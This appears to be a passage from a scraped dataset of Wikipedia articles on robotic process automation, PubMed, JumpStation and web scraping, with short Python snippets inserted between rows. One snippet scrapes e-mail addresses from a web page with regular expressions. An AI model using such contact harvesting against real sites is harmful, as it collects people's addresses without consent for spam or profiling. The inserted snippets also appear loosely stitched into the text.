JSTOR identifier Library of Congress Control Number Mathematical Reviews identifier Online Computer Library Center number Open Library identifier Office of Scientific and Technical Information identifier PubMed Central article number PubMed Unique Identifier Request for Comments number The corpus ID from the paper's Semantic Scholar page, if available. Displays as a link to the Semantic Scholar page.
Social Science Research Network Zentralblatt MATH journal identifier A unique identifier used where none of the specialized ones are applicable Classification of the access restrictions on the URL ('registration', 'subscription' or 'limited') The URL of an archived copy of a web page, if or in case the URL becomes unavailable; requires 'archive-date' Date when the original URL was archived; do not wikilink The full date when the original URL was accessed; do not wikilink Relevant text quoted from the source; displays last, enclosed in quotes; must include terminating punctuation The closing punctuation for the citation; ignored if 'quote' is defined; to suppress use reserved keyword 'none' An anchor identifier; can be made the target of wikilinks to full references. To inhibit anchor ID creation, set ref=none. Provider of the article (not the publisher), usually an aggregator of journal articles or a repository If the full text is available from ADS via this Bibcode, type 'free' If the full text is free to read via the DOI, type 'free' If the full text is free to read via the HDL, type 'free' If the full text is free to read on JSTOR, type 'free' If the full text is free to read on OpenLibrary, type 'free' If the full text is free to read on OSTI, type 'free' This template produces COinS metadata; see COinS in Wikipedia for background information. |
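Picking up the forward reference above: the percent-encoding rule described in the citation help can be reproduced with Python's standard library. This is a minimal sketch only; the example URL and the set of characters left unescaped are illustrative assumptions, not part of the original text.
# Minimal sketch: percent-encode a URL before placing it in a citation template parameter.
# The URL and the 'safe' character set below are illustrative assumptions.
from urllib.parse import quote
raw_url = "https://example.org/my article?name=café menu"  # hypothetical URL with a space and a non-ASCII character
encoded_url = quote(raw_url, safe=":/?=&")  # leave the URL's structural characters untouched
print(encoded_url)  # spaces become %20, 'é' becomes %C3%A9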
294 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Robotic_process_automation | Robotic process automation (RPA) is a form of business process automation that is based on software robots (bots) or artificial intelligence (AI) agents. 1 RPA should not be confused with artificial intelligence as it is based on automation technology following a predefined workflow. 2 It is sometimes referred to as software robotics (not to be confused with robot software). In traditional workflow automation tools, a software developer produces a list of actions to automate a task and interface to the back-end system using internal application programming interfaces (APIs) or a dedicated scripting language. In contrast, RPA systems develop the action list by watching the user perform that task in the application's graphical user interface (GUI), and then perform the automation by repeating those tasks directly in the GUI. This can lower the barrier to the use of automation in products that might not otherwise feature APIs for this purpose. RPA tools have strong technical similarities to graphical user interface testing tools. These tools also automate interactions with the GUI, and often do so by repeating a set of demonstration actions performed by a user. RPA tools differ from such systems in that they allow data to be handled in and between multiple applications, for instance, receiving email containing an invoice, extracting the data, and then typing that into a bookkeeping system. The typical benefits of robotic automation include reduced cost; increased speed, accuracy, and consistency; and improved quality and scalability of production. Automation can also provide extra security, especially for sensitive data and financial services. As a form of automation, the concept has been around for a long time in the form of screen scraping, which can be traced back to early forms of malware. However, RPA is much more extensible, consisting of API integration into other enterprise applications, connectors into ITSM systems, terminal services and even some types of AI (e.g. machine learning) services such as image recognition. It is considered to be a significant technological evolution in the sense that new software platforms are emerging which are sufficiently mature, resilient, scalable and reliable to make this approach viable for use in large enterprises 3 (who would otherwise be reluctant due to perceived risks to quality and reputation). A principal barrier to the adoption of self-service is often technological: it may not always be feasible or economically viable to retrofit new interfaces onto existing systems. Moreover, organisations may wish to layer a variable and configurable set of process rules on top of the system interfaces which may vary according to market offerings and the type of customer. This only adds to the cost and complexity of the technological implementation. Robotic automation software provides a pragmatic means of deploying new services in this situation, where the robots simply mimic the behaviour of humans to perform the back-end transcription or processing. The relative affordability of this approach arises from the fact that no new IT transformation or investment is required; instead the software robots simply leverage greater use out of existing IT assets. The hosting of RPA services also aligns with the metaphor of a software robot, with each robotic instance having its own virtual workstation, much like a human worker.
The robot uses keyboard and mouse controls to take actions and execute automations. Normally all of these actions take place in a virtual environment and not on screen; the robot does not need a physical screen to operate, rather it interprets the screen display electronically. The scalability of modern solutions based on architectures such as these owes much to the advent of virtualization technology, without which the scalability of large deployments would be limited by the available capacity to manage physical hardware and by the associated costs. The implementation of RPA in business enterprises has shown dramatic cost savings when compared to traditional non-RPA solutions. 4 There are however several risks with RPA. Criticism includes risks of stifling innovation and creating a more complex maintenance environment of existing software that now needs to consider the use of graphical user interfaces in a way they weren't intended to be used. 5 According to Harvard Business Review, most operations groups adopting RPA have promised their employees that automation would not result in layoffs. 6 Instead, workers have been redeployed to do more interesting work. One academic study highlighted that knowledge workers did not feel threatened by automation: they embraced it and viewed the robots as team-mates. 7 The same study highlighted that, rather than resulting in a lower "headcount", the technology was deployed in such a way as to achieve more work and greater productivity with the same number of people. Conversely, however, some analysts proffer that RPA represents a threat to the business process outsourcing (BPO) industry. 8 The thesis behind this notion is that RPA will enable enterprises to "repatriate" processes from offshore locations into local data centers, with the benefit of this new technology. The effect, if true, will be to create high-value jobs for skilled process designers in onshore locations (and within the associated supply chain of IT hardware, data center management, etc.) but to decrease the available opportunity to low-skilled workers offshore. On the other hand, this discussion appears to be healthy ground for debate as another academic study was at pains to counter the so-called "myth" that RPA will bring back many jobs from offshore. 7 Academic studies 9 10 project that RPA, among other technological trends, is expected to drive a new wave of productivity and efficiency gains in the global labour market. Although not directly attributable to RPA alone, Oxford University conjectures that up to 35% of all jobs might be automated by 2035. 9 There are geographic implications to the trend in robotic automation. In the example above where an offshored process is "repatriated" under the control of the client organization (or even displaced by a business process outsourcer) from an offshore location to a data centre, the impact will be a deficit in economic activity to the offshore location and an economic benefit to the originating economy. On this basis, developed economies with skills and technological infrastructure to develop and support a robotic automation capability can be expected to achieve a net benefit from the trend. 
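As a rough illustration of the keyboard-and-mouse replay described above, the sketch below drives a GUI with the third-party pyautogui package. The action list, coordinates, and text are hypothetical placeholders; a real RPA platform would add recording, error handling, screen interpretation, and orchestration on top of this idea.
# Rough sketch only: replay a recorded GUI action list, in the spirit of the RPA approach described above.
# Assumes the third-party 'pyautogui' package; coordinates and field values are hypothetical placeholders.
import time
import pyautogui
action_list = [
    ("click", (350, 220)),        # e.g. focus the "invoice number" field of a bookkeeping app
    ("type", "INV-2023-0042"),    # e.g. data previously extracted from an e-mail
    ("hotkey", ("tab",)),         # move to the next field
    ("type", "199.95"),
    ("click", (350, 400)),        # e.g. press the "Save" button
]
for action, arg in action_list:
    if action == "click":
        pyautogui.click(*arg)
    elif action == "type":
        pyautogui.typewrite(arg, interval=0.05)
    elif action == "hotkey":
        pyautogui.hotkey(*arg)
    time.sleep(0.5)  # crude pacing so the target application can keep up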
In a TEDx talk 11 hosted by University College London (UCL), entrepreneur David Moss explains that digital labour in the form of RPA is likely to revolutionize the cost model of the services industry by driving the price of products and services down, while simultaneously improving the quality of outcomes and creating increased opportunity for the personalization of services. In a separate TEDx talk in 2019, 12 Japanese business executive and former CIO of Barclays bank Koichi Hasegawa noted that digital robots can have a positive effect on society if we start using robots with empathy to help every person. He provides a case study of the Japanese insurance companies Sompo Japan and Aioi, both of whom introduced bots to speed up the process of insurance pay-outs in past massive disaster incidents. Meanwhile, Professor Willcocks, author of the LSE paper 10 cited above, speaks of increased job satisfaction and intellectual stimulation, characterising the technology as having the ability to "take the robot out of the human", 13 a reference to the notion that robots will take over the mundane and repetitive portions of people's daily workload, leaving them to be used in more interpersonal roles or to concentrate on the remaining, more meaningful, portions of their day. It was also found in a 2021 study observing the effects of robotization in Europe that the gender pay gap increased at a rate of 0.18% for every 1% increase in robotization of a given industry. 14 Unassisted RPA, or RPAAI, 15 16 is the next generation of RPA-related technologies. Technological advancements around artificial intelligence allow a process to be run on a computer without needing input from a user. Hyperautomation is the application of advanced technologies like RPA, artificial intelligence, machine learning (ML) and process mining to augment workers and automate processes in ways that are significantly more impactful than traditional automation capabilities. 17 18 19 Hyperautomation is the combination of automation tools to deliver work. 20 Gartner's report notes that this trend was kicked off with robotic process automation (RPA). The report notes that "RPA alone is not hyperautomation. Hyperautomation requires a combination of tools to help support replicating pieces of where the human is involved in a task." 21 Back office clerical processes outsourced by large organisations - particularly those sent offshore - tend to be simple and transactional in nature, requiring little (if any) analysis or subjective judgement. This would seem to make an ideal starting point for organizations beginning to adopt robotic automation for the back office. Whether client organisations choose to take outsourced processes back "in house" from their business process outsourcing (BPO) providers, thus representing a threat to the future of the BPO business, 22 or whether the BPOs implement such automations on their clients' behalf may well depend on a number of factors. Conversely, however, a BPO provider may seek to effect some form of client lock-in by means of automation. By removing cost from a business operation, where the BPO provider is considered to be the owner of the intellectual property and physical implementation of a robotic automation solution (perhaps in terms of hardware, ownership of software licences, etc.), the provider can make it very difficult for the client to take a process back "in house" or elect a new BPO provider.
This effect occurs as the associated cost savings made through automation would - temporarily at least - have to be reintroduced to the business whilst the technical solution is reimplemented in the new operational context. The geographically agnostic nature of software means that new business opportunities may arise for those organisations that have a political or regulatory impediment to offshoring or outsourcing. A robotised automation can be hosted in a data centre in any jurisdiction and this has two major consequences for BPO providers. Firstly, for example, a sovereign government may not be willing or legally able to outsource the processing of tax affairs and security administration. On this basis, if robots are compared to a human workforce, this creates a genuinely new opportunity for a "third sourcing" option, after the choices of onshore vs. offshore. Secondly, and conversely, BPO providers have previously relocated outsourced operations to different political and geographic territories in response to changing wage inflation and new labor arbitrage opportunities elsewhere. By contrast, a data centre solution would seem to offer a fixed and predictable cost base that, if sufficiently low in cost on a robot vs. human basis, would seem to eliminate any potential need or desire to continually relocate operational bases. While robotic process automation has many benefits, including cost efficiency and consistency in performance, it also has some limitations. Current RPA solutions demand continual technical support to handle system changes; they therefore lack the ability to autonomously adapt to new conditions. Because of this limitation, the system sometimes needs manual reconfiguration, which in turn has an effect on efficiency. 23 RPA is based on automation technology following a predefined workflow, while artificial intelligence is data-driven and focuses on processing information to make predictions. There is therefore a distinct difference between how the two systems operate. AI aims to mimic human intelligence, whereas RPA is focused on reproducing tasks that are typically human-directed. 24 Moreover, RPA could also be explained as virtual robots that take over routinized human work; it can identify data by interpreting the underlying tags. RPA, therefore, is based on machine learning, whereas AI utilizes self-learning technologies. 25 |
295 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/PMID_(identifier) | PubMed is a free database including primarily the MEDLINE database of references and abstracts on life sciences and biomedical topics. The United States National Library of Medicine (NLM) at the National Institutes of Health maintains the database as part of the Entrez system of information retrieval. 1 From 1971 to 1997, online access to the MEDLINE database had been primarily through institutional facilities, such as university libraries. 2 PubMed, first released in January 1996, ushered in the era of private, free, home- and office-based MEDLINE searching. 3 The PubMed system was offered free to the public starting in June 1997. 2 In addition to MEDLINE, PubMed provides access to several related resources. Many PubMed records contain links to full text articles, some of which are freely available, often in PubMed Central 5 and local mirrors, such as Europe PubMed Central. 6 Information about the journals indexed in MEDLINE, and available through PubMed, is found in the NLM Catalog. 7 As of 23 May 2023, PubMed has more than 35 million citations and abstracts dating back to 1966, selectively to the year 1865, and very selectively to 1809. As of the same date, 24.6 million of PubMed's records are listed with their abstracts, and 26.8 million records have links to full-text versions (of which 10.9 million articles are available full-text for free). 8 Over the last 10 years (ending 31 December 2019), an average of nearly one million new records were added each year. In 2016, NLM changed the indexing system so that publishers are able to directly correct typos and errors in PubMed-indexed articles. 9 PubMed has been reported to include some articles published in predatory journals. MEDLINE and PubMed policies for the selection of journals for database inclusion are slightly different. Weaknesses in the criteria and procedures for indexing journals in PubMed Central may allow publications from predatory journals to leak into PubMed. 10 A new PubMed interface was launched in October 2009 and encouraged the use of such quick, Google-like search formulations; they have also been described as 'telegram' searches. 11 By default the results are sorted by Most Recent, but this can be changed to Best Match, Publication Date, First Author, Last Author, Journal, or Title. 12 The PubMed website design and domain was updated in January 2020 and became the default on 15 May 2020, with updated and new features. 13 There was a critical reaction from many researchers who frequently use the site. 14 PubMed/MEDLINE can be accessed via handheld devices, using for instance the "PICO" option (for focused clinical questions) created by the NLM. 15 A "PubMed Mobile" option, providing access to a mobile friendly, simplified PubMed version, is also available. 16 Simple searches on PubMed can be carried out by entering key aspects of a subject into PubMed's search window. PubMed translates this initial search formulation and automatically adds field names, relevant MeSH (Medical Subject Headings) terms, synonyms, Boolean operators, and 'nests' the resulting terms appropriately, enhancing the search formulation significantly, in particular by routinely combining (using the OR operator) textwords and MeSH terms.
The examples given in a PubMed tutorial 17 demonstrate how this automatic process works: Causes Sleep Walking is translated as ("etiology"[Subheading] OR "etiology"[All Fields] OR "causes"[All Fields] OR "causality"[MeSH Terms] OR "causality"[All Fields]) AND ("somnambulism"[MeSH Terms] OR "somnambulism"[All Fields] OR ("sleep"[All Fields] AND "walking"[All Fields]) OR "sleep walking"[All Fields]) Likewise, Heart Attack Aspirin Prevention is translated as ("myocardial infarction"[MeSH Terms] OR ("myocardial"[All Fields] AND "infarction"[All Fields]) OR "myocardial infarction"[All Fields] OR ("heart"[All Fields] AND "attack"[All Fields]) OR "heart attack"[All Fields]) AND ("aspirin"[MeSH Terms] OR "aspirin"[All Fields]) AND ("prevention and control"[Subheading] OR ("prevention"[All Fields] AND "control"[All Fields]) OR "prevention and control"[All Fields] OR "prevention"[All Fields]) For optimal searches in PubMed, it is necessary to understand its core component, MEDLINE, and especially the MeSH (Medical Subject Headings) controlled vocabulary used to index MEDLINE articles. They may also require complex search strategies, use of field names (tags), proper use of limits and other features; reference librarians and search specialists offer search services. 18 19 Typing directly into PubMed's search window is only recommended for the search of unequivocal topics or new interventions that do not yet have a MeSH heading created, as well as for the search for commercial brands of medicines and proper nouns. It is also useful when there is no suitable heading or the descriptor represents a partial aspect. The search using the thesaurus MeSH is more accurate and will give fewer irrelevant results. In addition, it avoids the disadvantage of free-text search, in which spelling, singular/plural or abbreviated differences have to be taken into consideration. On the other hand, articles more recently incorporated into the database to which descriptors have not yet been assigned will not be found. Therefore, to guarantee an exhaustive search, a combination of controlled language headings and free text terms must be used. 20 When a journal article is indexed, numerous article parameters are extracted and stored as structured information. Such parameters are: Article Type (MeSH terms, e.g., "Clinical Trial"), Secondary identifiers (MeSH terms), Language, Country of the Journal or publication history (e-publication date, print journal publication date). The publication type parameter allows searching by the type of publication, including reports of various kinds of clinical research. 21 Since July 2005, the MEDLINE article indexing process extracts identifiers from the article abstract and puts those in a field called Secondary Identifier (SI). The secondary identifier field is to store accession numbers to various databases of molecular sequence data, gene expression or chemical compounds and clinical trial IDs. For clinical trials, PubMed extracts trial IDs for the two largest trial registries: ClinicalTrials.gov (NCT identifier) and the International Standard Randomized Controlled Trial Number Register (ISRCTN identifier). 22 A reference which is judged particularly relevant can be marked and "related articles" can be identified. If relevant, several studies can be selected and related articles to all of them can be generated (on PubMed or any of the other NCBI Entrez databases) using the 'Find related data' option. The related articles are then listed in order of "relatedness".
To create these lists of related articles, PubMed compares words from the title and abstract of each citation, as well as the MeSH headings assigned, using a powerful word-weighted algorithm. 23 The 'related articles' function has been judged to be so precise that the authors of a paper suggested it can be used instead of a full search. 24 PubMed automatically links to MeSH terms and subheadings. Examples would be: "bad breath" links to (and includes in the search) "halitosis", "heart attack" to "myocardial infarction", "breast cancer" to "breast neoplasms". Where appropriate, these MeSH terms are automatically "expanded", that is, include more specific terms. Terms like "nursing" are automatically linked to "Nursing"[MeSH] or "Nursing"[Subheading]. This feature is called Auto Term Mapping and is enacted, by default, in free text searching but not exact phrase searching (i.e. enclosing the search query with double quotes). 25 This feature makes PubMed searches more sensitive and avoids false-negative (missed) hits by compensating for the diversity of medical terminology. 25 PubMed does not apply automatic mapping of the term in the following circumstances: by writing the quoted phrase (e.g., "kidney allograft"), when truncated on the asterisk (e.g., kidney allograft*), and when searching with field labels (e.g., Cancer[ti]). 20 The PubMed optional facility "My NCBI" (with free registration) provides tools for saving searches and filtering search results, among a wide range of other options. 26 The "My NCBI" area can be accessed from any computer with web-access. An earlier version of "My NCBI" was called "PubMed Cubby". 27 LinkOut is an NLM facility to link and make available full-text local journal holdings. 28 Some 3,200 sites (mainly academic institutions) participate in this NLM facility (as of March 2010), from Aalborg University in Denmark to ZymoGenetics in Seattle. 29 Users at these institutions see their institution's logo within the PubMed search result (if the journal is held at that institution) and can access the full text. LinkOut is being consolidated with Outside Tool as of the major platform update coming in the summer of 2019. 30 In 2016, PubMed began allowing authors of articles to comment on articles indexed by PubMed. This feature was initially tested in a pilot mode (since 2013) and was made permanent in 2016. 31 In February 2018, PubMed Commons was discontinued due to the fact that "usage has remained minimal". 32 33 askMEDLINE, a free-text, natural language query tool for MEDLINE/PubMed developed by the NLM, is also suitable for handhelds. 34 A PMID (PubMed identifier or PubMed unique identifier) 35 is a unique integer value, starting at 1, assigned to each PubMed record. A PMID is not the same as a PMCID (PubMed Central identifier), which is the identifier for all works published in the free-to-access PubMed Central. 36 The assignment of a PMID or PMCID to a publication tells the reader nothing about the type or quality of the content. PMIDs are assigned to letters to the editor, editorial opinions, op-ed columns, and any other piece that the editor chooses to include in the journal, as well as peer-reviewed papers. The existence of the identification number is also not proof that the papers have not been retracted for fraud, incompetence, or misconduct. The announcement about any corrections to original papers may be assigned a PMID. Each number that is entered in the PubMed search window is treated by default as if it were a PMID. Therefore, any reference in PubMed can be located using the PMID.
The National Library of Medicine leases the MEDLINE information to a number of private vendors such as Embase, Ovid, Dialog, EBSCO, Knowledge Finder and many other commercial, non-commercial, and academic providers. 37 As of October 2008 update , more than 500 licenses had been issued, more than 200 of them to providers outside the United States. As licenses to use MEDLINE data are available for free, the NLM in effect provides a free testing ground for a wide range 38 of alternative interfaces and 3rd party additions to PubMed, one of a very few large, professionally curated databases which offers this option. Lu identifies a sample of 28 current and free Web-based PubMed versions, requiring no installation or registration, which are grouped into four categories: 38 As most of these and other alternatives rely essentially on PubMed MEDLINE data leased under license from the NLM PubMed, the term "PubMed derivatives" has been suggested. 38 Without the need to store about 90 GB of original PubMed Datasets, anybody can write PubMed applications using the eutils-application program interface as described in "The E-utilities In-Depth: Parameters, Syntax and More", by Eric Sayers, PhD. 49 Various citation format generators, taking PMID numbers as input, are examples of web applications making use of the eutils-application program interface. Sample web pages include Citation Generator Mick Schroeder, Pubmed Citation Generator Ultrasound of the Week, PMID2cite, and Cite this for me. Alternative methods to mine the data in PubMed use programming environments such as Matlab, Python or R. In these cases, queries of PubMed are written as lines of code and passed to PubMed and the response is then processed directly in the programming environment. Code can be automated to systematically query with different keywords such as disease, year, organs, etc. In addition to its traditional role as a biomedical database, PubMed has become common resource for training biomedical language models. 50 Recent advancements in this field include the development of models like PubMedGPT, a 2.7B parameter model trained on PubMed data by Stanford CRFM, and Microsoft's BiomedCLIP-PubMedBERT, which utilizes figure-caption pairs from PubMed Central for vision-language processing. These models demonstrate the significant potential of PubMed data in enhancing the capabilities of AI in medical research and healthcare applications. Such advancements underline the growing intersection between large-scale data mining and AI development in the biomedical field. The data accessible by PubMed can be mirrored locally using an unofficial tool such as MEDOC. 51 Millions of PubMed records augment various open data datasets about open access, like Unpaywall. Data analysis tools like Unpaywall Journals are used by libraries to assist with big deal cancellations: libraries can avoid subscriptions for materials already served by instant open access via open archives like PubMed Central. 52 |
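As a minimal sketch of querying PubMed programmatically through the E-utilities interface mentioned above, the snippet below sends an esearch request with the requests library. The search term is an illustrative assumption, and production use should follow NCBI's usage guidelines (rate limits, optional API key).
# Minimal sketch: query PubMed via the NCBI E-utilities 'esearch' endpoint.
# The fielded search term is illustrative; real usage should respect NCBI rate limits.
import requests
ESEARCH = "https://eutils.ncbi.nlm.nih.gov/entrez/eutils/esearch.fcgi"
params = {
    "db": "pubmed",
    "term": '"myocardial infarction"[MeSH Terms] AND "aspirin"[MeSH Terms]',
    "retmode": "json",
    "retmax": 5,
}
resp = requests.get(ESEARCH, params=params, timeout=10)
result = resp.json()["esearchresult"]
print("Total hits:", result["count"])
print("First PMIDs:", result["idlist"])  # these PMIDs could then be passed to esummary or efetch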
296 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/JumpStation | JumpStation was the first WWW search engine that behaved, and appeared to the user, the way current web search engines do. 1 It started indexing on 12 December 1993 2 and was announced on the Mosaic "What's New" webpage on 21 December 1993. 3 It was hosted at the University of Stirling in Scotland. It was written by Jonathon Fletcher, from Scarborough, England, 4 5 who graduated from the University with a first class honours degree in Computing Science in the summer of 1992 6 and has subsequently been named "father of the search engine". 7 He was subsequently employed there as a systems administrator. JumpStation's development discontinued when he left the University in late 1994, having failed to get any investors, including the University of Stirling, to financially back his idea. 6 At this point the database had 275,000 entries spanning 1,500 servers. 8 JumpStation used document titles and headings to index the web pages found using a simple linear search, and did not provide any ranking of results. 8 9 However, JumpStation had the same basic shape as Google Search in that it used an index solely built by a web robot, searched this index using keyword queries entered by the user on a web form whose location was well-known, 10 and presented its results in the form of a list of URLs that matched those keywords. JumpStation was nominated for a "Best Of The Web" award in 1994 11 and the story of its origin and development written up, using interviews with Fletcher, by Wishart and Bochsler. 12 |
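To make the indexing model described above concrete, here is a toy sketch, under obvious simplifying assumptions, of a JumpStation-style search: an index built only from page titles and headings, scanned linearly for a keyword, returning an unranked list of matching URLs. The sample pages are invented for illustration.
# Toy sketch of a JumpStation-style index: titles/headings only, linear keyword search, no ranking.
title_index = {
    "http://example.ac.uk/physics": "Department of Physics - Research Groups",
    "http://example.ac.uk/library": "University Library Catalogue",
    "http://example.ac.uk/computing": "Computing Science Honours Projects",
}
def search(keyword):
    keyword = keyword.lower()
    # Linear scan over every indexed document; results are unranked, in index order.
    return [url for url, title in title_index.items() if keyword in title.lower()]
print(search("computing"))  # ['http://example.ac.uk/computing']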
297 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Web_scraping#cite_ref-7 | Web scraping, web harvesting, or web data extraction is data scraping used for extracting data from websites. 1 Web scraping software may directly access the World Wide Web using the Hypertext Transfer Protocol or a web browser. While web scraping can be done manually by a software user, the term typically refers to automated processes implemented using a bot or web crawler. It is a form of copying in which specific data is gathered and copied from the web, typically into a central local database or spreadsheet, for later retrieval or analysis. Scraping a web page involves fetching it and extracting from it. Fetching is the downloading of a page (which a browser does when a user views a page). Therefore, web crawling is a main component of web scraping, to fetch pages for later processing. Once fetched, extraction can take place. The content of a page may be parsed, searched and reformatted, and its data copied into a spreadsheet or loaded into a database. Web scrapers typically take something out of a page, to make use of it for another purpose somewhere else. An example would be finding and copying names and telephone numbers, companies and their URLs, or e-mail addresses to a list (contact scraping). As well as contact scraping, web scraping is used as a component of applications used for web indexing, web mining and data mining, online price change monitoring and price comparison, product review scraping (to watch the competition), gathering real estate listings, weather data monitoring, website change detection, research, tracking online presence and reputation, web mashup, and web data integration. Web pages are built using text-based mark-up languages (HTML and XHTML), and frequently contain a wealth of useful data in text form. However, most web pages are designed for human end-users and not for ease of automated use. As a result, specialized tools and software have been developed to facilitate the scraping of web pages. Web scraping applications include market research, price comparison, content monitoring, and more. Businesses rely on web scraping services to efficiently gather and utilize this data. Newer forms of web scraping involve monitoring data feeds from web servers. For example, JSON is commonly used as a transport mechanism between the client and the web server. There are methods that some websites use to prevent web scraping, such as detecting and disallowing bots from crawling (viewing) their pages. In response, there are web scraping systems that rely on using techniques in DOM parsing, computer vision and natural language processing to simulate human browsing to enable gathering web page content for offline parsing Web scraping is the process of automatically mining data or collecting information from the World Wide Web. It is a field with active developments sharing a common goal with the semantic web vision, an ambitious initiative that still requires breakthroughs in text processing, semantic understanding, artificial intelligence and human-computer interactions. The simplest form of web scraping is manually copying and pasting data from a web page into a text file or spreadsheet. Sometimes even the best web-scraping technology cannot replace a human's manual examination and copy-and-paste, and sometimes this may be the only workable solution when the websites for scraping explicitly set up barriers to prevent machine automation. 
A simple yet powerful approach to extract information from web pages can be based on the UNIX grep command or regular expression-matching facilities of programming languages (for instance Perl or Python). Static and dynamic web pages can be retrieved by posting HTTP requests to the remote web server using socket programming. Many websites have large collections of pages generated dynamically from an underlying structured source like a database. Data of the same category are typically encoded into similar pages by a common script or template. In data mining, a program that detects such templates in a particular information source, extracts its content, and translates it into a relational form, is called a wrapper. Wrapper generation algorithms assume that input pages of a wrapper induction system conform to a common template and that they can be easily identified in terms of a URL common scheme. 3 Moreover, some semi-structured data query languages, such as XQuery and the HTQL, can be used to parse HTML pages and to retrieve and transform page content. By embedding a full-fledged web browser, such as the Internet Explorer or the Mozilla browser control, programs can retrieve the dynamic content generated by client-side scripts. These browser controls also parse web pages into a DOM tree, based on which programs can retrieve parts of the pages. Languages such as Xpath can be used to parse the resulting DOM tree. There are several companies that have developed vertical specific harvesting platforms. These platforms create and monitor a multitude of "bots" for specific verticals with no "man in the loop" (no direct human involvement), and no work related to a specific target site. The preparation involves establishing the knowledge base for the entire vertical and then the platform creates the bots automatically. The platform's robustness is measured by the quality of the information it retrieves (usually number of fields) and its scalability (how quick it can scale up to hundreds or thousands of sites). This scalability is mostly used to target the Long Tail of sites that common aggregators find complicated or too labor-intensive to harvest content from. The pages being scraped may embrace metadata or semantic markups and annotations, which can be used to locate specific data snippets. If the annotations are embedded in the pages, as Microformat does, this technique can be viewed as a special case of DOM parsing. In another case, the annotations, organized into a semantic layer, 4 are stored and managed separately from the web pages, so the scrapers can retrieve data schema and instructions from this layer before scraping the pages. There are efforts using machine learning and computer vision that attempt to identify and extract information from web pages by interpreting pages visually as a human being might. 5 Uses advanced AI to interpret and process web page content contextually, extracting relevant information, transforming data, and customizing outputs based on the content's structure and meaning. This method enables more intelligent and flexible data extraction, accommodating complex and dynamic web content. The world of web scraping offers a variety of software tools designed to simplify and customize the process of data extraction from websites. These tools vary in their approach and capabilities, making web scraping accessible to both novice users and advanced programmers. 
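The regular-expression approach described above can be sketched in a few lines of Python. The target URL is a placeholder and the patterns are deliberately naive; for production use, a DOM parser is generally more robust than regex matching against raw HTML.
# Naive sketch of regex-based extraction, in the spirit of the grep/regex technique described above.
# The URL is a placeholder; the patterns are intentionally simple and will miss edge cases.
import re
import requests
html = requests.get("https://example.com/", timeout=10).text
links = re.findall(r'href="(https?://[^"]+)"', html)     # absolute links only
emails = re.findall(r"[\w.+-]+@[\w-]+\.[\w.-]+", html)    # rough e-mail address pattern
print(sorted(set(links))[:10])
print(sorted(set(emails))[:10])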
Some advanced web scraping software can automatically recognize the data structure of a web page, eliminating the need for manual coding. Others provide a recording interface that allows users to record their interactions with a website, thus creating a scraping script without writing a single line of code. Many tools also include scripting functions for more customized extraction and transformation of content, along with database interfaces to store the scraped data locally. Web scraping tools are versatile in their functionality. Some can directly extract data from APIs, while others are capable of handling websites with AJAX-based dynamic content loading or login requirements. Point-and-click software, for instance, empowers users without advanced coding skills to benefit from web scraping. This democratizes access to data, making it easier for a broader audience to leverage the power of web scraping. Popular Web Scraping Tools BeautifulSoup: A Python library that provides simple methods for extracting data from HTML and XML files. Scrapy: An open-source and collaborative web crawling framework for Python that allows you to extract the data, process it, and store it. Octoparse: A no-code web scraping tool that offers a user-friendly interface for extracting data from websites without needing programming skills. ParseHub: Another no-code web scraper that can handle dynamic content and works with AJAX-loaded sites. Apify: A platform that offers a wide range of scraping tools and the ability to create custom scrapers. InstantAPI.ai: An AI-powered tool that transforms any web page into personalized APIs instantly, offering advanced data extraction and customization. Some platforms provide not only tools for web scraping but also opportunities for developers to share and potentially monetize their scraping solutions. By leveraging these tools and platforms, users can unlock the full potential of web scraping, turning raw data into valuable insights and opportunities. 6 The legality of web scraping varies across the world. In general, web scraping may be against the terms of service of some websites, but the enforceability of these terms is unclear. 7 In the United States, website owners can use three major legal claims to prevent undesired web scraping: (1) copyright infringement (compilation), (2) violation of the Computer Fraud and Abuse Act ("CFAA"), and (3) trespass to chattel. 8 However, the effectiveness of these claims relies upon meeting various criteria, and the case law is still evolving. For example, with regard to copyright, while outright duplication of original expression will in many cases be illegal, in the United States the courts ruled in Feist Publications v. Rural Telephone Service that duplication of facts is allowable. U.S. courts have acknowledged that users of "scrapers" or "robots" may be held liable for committing trespass to chattels, 9 10 which involves a computer system itself being considered personal property upon which the user of a scraper is trespassing. The best known of these cases, eBay v. Bidder's Edge, resulted in an injunction ordering Bidder's Edge to stop accessing, collecting, and indexing auctions from the eBay web site. This case involved automatic placing of bids, known as auction sniping. 
However, in order to succeed on a claim of trespass to chattels, the plaintiff must demonstrate that the defendant intentionally and without authorization interfered with the plaintiff's possessory interest in the computer system and that the defendant's unauthorized use caused damage to the plaintiff. Not all cases of web spidering brought before the courts have been considered trespass to chattels. 11 One of the first major tests of screen scraping involved American Airlines (AA) and a firm called FareChase. 12 AA successfully obtained an injunction from a Texas trial court, stopping FareChase from selling software that enables users to compare online fares if the software also searches AA's website. The airline argued that FareChase's websearch software trespassed on AA's servers when it collected the publicly available data. FareChase filed an appeal in March 2003. By June, FareChase and AA agreed to settle and the appeal was dropped. 13 Southwest Airlines has also challenged screen-scraping practices, and has involved both FareChase and another firm, Outtask, in a legal claim. Southwest Airlines charged that the screen-scraping is illegal since it is an example of "Computer Fraud and Abuse" and has led to "Damage and Loss" and "Unauthorized Access" of Southwest's site. It also constitutes "Interference with Business Relations", "Trespass", and "Harmful Access by Computer". They also claimed that screen-scraping constitutes what is legally known as "Misappropriation and Unjust Enrichment", as well as being a breach of the web site's user agreement. Outtask denied all these claims, claiming that the prevailing law, in this case, should be US Copyright law and that under copyright, the pieces of information being scraped would not be subject to copyright protection. Although the cases were never resolved in the Supreme Court of the United States, FareChase was eventually shuttered by parent company Yahoo!, and Outtask was purchased by travel expense company Concur. 14 In 2012, a startup called 3Taps scraped classified housing ads from Craigslist. Craigslist sent 3Taps a cease-and-desist letter and blocked their IP addresses and later sued, in Craigslist v. 3Taps. The court held that the cease-and-desist letter and IP blocking were sufficient for Craigslist to properly claim that 3Taps had violated the Computer Fraud and Abuse Act (CFAA). Although these are early scraping decisions, and the theories of liability are not uniform, it is difficult to ignore a pattern emerging that the courts are prepared to protect proprietary content on commercial sites from uses which are undesirable to the owners of such sites. However, the degree of protection for such content is not settled and will depend on the type of access made by the scraper, the amount of information accessed and copied, the degree to which the access adversely affects the site owner's system and the types and manner of prohibitions on such conduct. 15 While the law in this area becomes 